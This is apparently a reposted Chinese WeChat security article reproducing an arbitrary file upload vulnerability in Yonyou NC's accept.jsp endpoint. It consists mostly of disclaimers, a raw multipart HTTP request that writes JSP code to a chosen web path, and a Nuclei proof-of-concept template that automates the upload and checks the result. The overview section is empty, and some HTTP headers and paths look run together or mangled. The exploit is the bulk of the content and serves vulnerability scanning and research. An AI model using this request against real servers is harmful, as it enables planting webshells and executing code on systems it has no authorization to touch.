免责声明
此内容仅供技术交流与学习,请勿用于未经授权的场景。请遵循相关法律与道德规范。任何因使用本文所述技术而引发的法律责任,与本文作者及发布平台无关。如有内容争议或侵权,请及时联系我们。谢谢!
漏洞概述
漏洞复现
POST /aim/equipmap/accept.jsp HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Cache-Control: max-age=0sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-ch-ua: "Google Chrome";v="117", "Chromium";v="117", "Not=A?Brand";v="24"Cookie: JSESSIONID=B78C500FE3ED18E919992117C5067EB6.serverAccept-Language: zh-CN,zh;q=0.9Accept-Encoding: gzip, deflateUpgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYcContent-Disposition: form-data; name="upload"; filename="config.txt"Content-Type: text/plain<% out.println("hello"); %>-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYcContent-Disposition: form-data; name="fname"webappsnc_webconfig.jsp-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--
NUCLEI POC
id: yonyou-nc-accept-fileuploadinfo:name: 用友NC accept.jsp任意文件上传漏洞author: rainseverity: criticaldescription: |用友NC(NC,用友软件企业管理软件)中存在一个严重漏洞,允许攻击者通过accept.jsp接口构造特定的请求包进行任意文件上传。该漏洞使得攻击者可以在受影响的系统上上传恶意文件,潜在风险包括远程执行恶意代码、访问敏感数据,以及其他危险操作。攻击者可以通过上传恶意文件来滥用系统,可能导致灾难性后果。reference:nonemetadata:verified: true: 2: icon_hash="1085941792"tags: yonyou, nc, 文件上传漏洞, 安全漏洞variables:file_name: "{{to_lower(rand_text_alpha(8))}}"file_content: "{{to_lower(rand_text_alpha(8))}}"http:raw:|-POST /aim/equipmap/accept.jsp HTTP/1.1Host: {{Hostname}}: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36: max-age=0: "Windows": ?0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7: "Google Chrome";v="117", "Chromium";v="117", "Not=A?Brand";v="24"Cookie: JSESSIONID=B78C500FE3ED18E919992117C5067EB6.server: zh-CN,zh;q=0.9: gzip, deflate: 1: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc: form-data; name="upload"; filename="{{file_name}}.txt": text/plainout.println("{{file_content}}"); %>-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc: form-data; name="fname"webappsnc_web{{file_name}}.jsp-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--|GET /{{file_name}}.jsp HTTP/1.1Host: {{Hostname}}: application/x-www-form-urlencoded: gzip: andmatchers:type: dsldsl:"status_code_2 == 200 && contains(body_2,'{{file_content}}')"
原文始发于微信公众号(知黑守白):「漏洞复现」用友NC accept.jsp任意文件上传漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论